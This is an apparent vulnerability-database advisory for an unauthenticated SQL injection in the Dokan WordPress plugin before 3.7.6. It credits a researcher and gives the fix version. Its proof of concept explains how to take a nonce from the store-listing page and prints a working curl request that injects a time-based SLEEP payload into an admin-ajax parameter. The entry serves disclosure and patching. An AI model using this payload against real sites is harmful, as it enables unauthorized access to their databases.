WordPress Plugin Vulnerabilities
Dokan < 3.7.6 - Unauthenticated SQLi
Description
The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users
Proof of Concept
Setup: - Install WooCommerce (dependency, no setup required) - Install the plugin, complete the wizard (no special configuration was performed - all defaults were accepted) Attack: - As an unauthenticated user, access the "Store List" page (default at /store-listing/) and extract the "search_products_nonce" from the source - Invoke the following curl command (with the extracted nonce in place) to induce a five second sleep: time curl "https://example.com/wp-admin/admin-ajax.php?action=dokan_json_search_products_and_variations&security=<NONCE-HERE>&term=x&user_ids='+AND+(SELECT+5362+FROM+(SELECT(SLEEP(5)))yWDg)--+qXby"
Affects Plugins
Fixed in version 3.7.6
References
Classification
Miscellaneous
Original Researcher
cydave
Submitter
cydave
Submitter website
Submitter twitter
Verified
Yes
Timeline
Publicly Published
2022-11-21 (about 6 months ago)
Added
2022-11-21 (about 6 months ago)
Last Updated
2022-11-21 (about 6 months ago)